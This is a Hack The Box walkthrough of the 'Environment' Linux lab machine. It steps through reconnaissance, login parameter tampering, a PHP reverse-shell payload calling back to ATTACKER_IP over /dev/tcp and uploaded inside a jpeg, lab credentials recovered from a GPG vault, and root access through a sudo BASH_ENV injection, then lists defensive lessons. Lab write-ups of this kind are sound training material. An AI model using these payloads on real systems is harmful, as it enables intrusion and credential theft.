# Environment HTB – Pentest Walkthrough

**Target:** Linux Machine  
**Difficulty:** Medium  
**Objective:** Capture `user.txt` and `root.txt`


## Reconnaissance

Initial Nmap scan to identify open ports and services:

```bash
nmap -sC -sV environment.htb

Findings:

    80/tcp – HTTP

    22/tcp – SSH

Checked port 80 and found a minimal landing page.
Directory Enumeration

Used Gobuster to brute-force directories:

gobuster dir -u http://environment.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Results:

    /login – Login form

    /storage – 404 Not Found

    /upload – Revealed PHP stack with Laravel

Exploitation
Burp Suite Parameter Tampering

Intercepted login request in Burp Suite and modified parameters:

    Set stay_logged_in to True

    Changed environment to production

Result: Developer account access
Gaining Dashboard Access

Logged in as dev, found dashboard with file upload functionality (potential LFI).
Reverse Shell Upload

    Created reverse shell payload:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"); ?>

Embedded .php shell into a .jpeg image file. 

Uploaded to /storage/files/.

Set up listener:

nc -lvnp 4444

Triggered payload → Gained shell.

Stabilized shell:

    python3 -c 'import pty; pty.spawn("/bin/bash")'

    Retrieved user.txt from /home.

Privilege Escalation
KeyVault Decryption

Found sensitive files in /home/hish/backup:

    keyvault.gpg

Decrypted GPG vault:

cp -R /home/hish/.gnupg /tmp
GNUPGHOME=/tmp/.gnupg gpg --decrypt /home/hish/backup/keyvault.gpg

Credentials:

"hish_ <hish@environment.htb>"
PAYPAL.COM -> Ihaves0meMon$yhere123
ENVIRONMENT.HTB -> marineSPm@ster!!
FACEBOOK.COM -> summerSunnyB3ACH!!

SSH Access as Hish

ssh hish@environment.htb

Checked sudo privileges:

sudo -l

Hish can run /usr/bin/systeminfo.
Exploiting Misconfigured Sudo Environment

    Created malicious script:

echo 'bash -p' > /tmp/root.sh
chmod +x /tmp/root.sh

Executed with manipulated variables:

    sudo ENV=/tmp/root.sh BASH_ENV=/tmp/root.sh /usr/bin/systeminfo

    Root shell obtained, retrieved /root/root.txt.

Key Takeaways

  Laravel misconfiguration enabled privilege escalation. Keeping frameworks and services updated is critical to avoid exposing unnecessary attack surfaces.

  Improper file validation allowed reverse shell upload. Strongly enforce file upload restrictions—prefer extension whitelisting and content-type 
  checks—to prevent arbitrary file uploads and Local File Inclusion (LFI) exploits.

  GPG keyvault contained sensitive plaintext credentials. Keys and secrets should be encrypted, 
  stored securely, and access-controlled to prevent credential leakage.

  Sudo misconfiguration allowed root escalation via environment variables. 
  Enforcing the principle of least privilege (PoLP) and carefully auditing sudo permissions helps block privilege escalation paths.

  Manual testing and enumeration were critical. Thorough enumeration uncovered vulnerabilities that automated tools might miss.

  Overall, I really enjoyed working on this machine. It wasn’t a simple walkthrough—I had to dig into documentation and use Google to 
  understand certain components and figure out how to leverage what I found for exploitation.
  The process was challenging but rewarding, and I picked up a lot of new skills along the way.
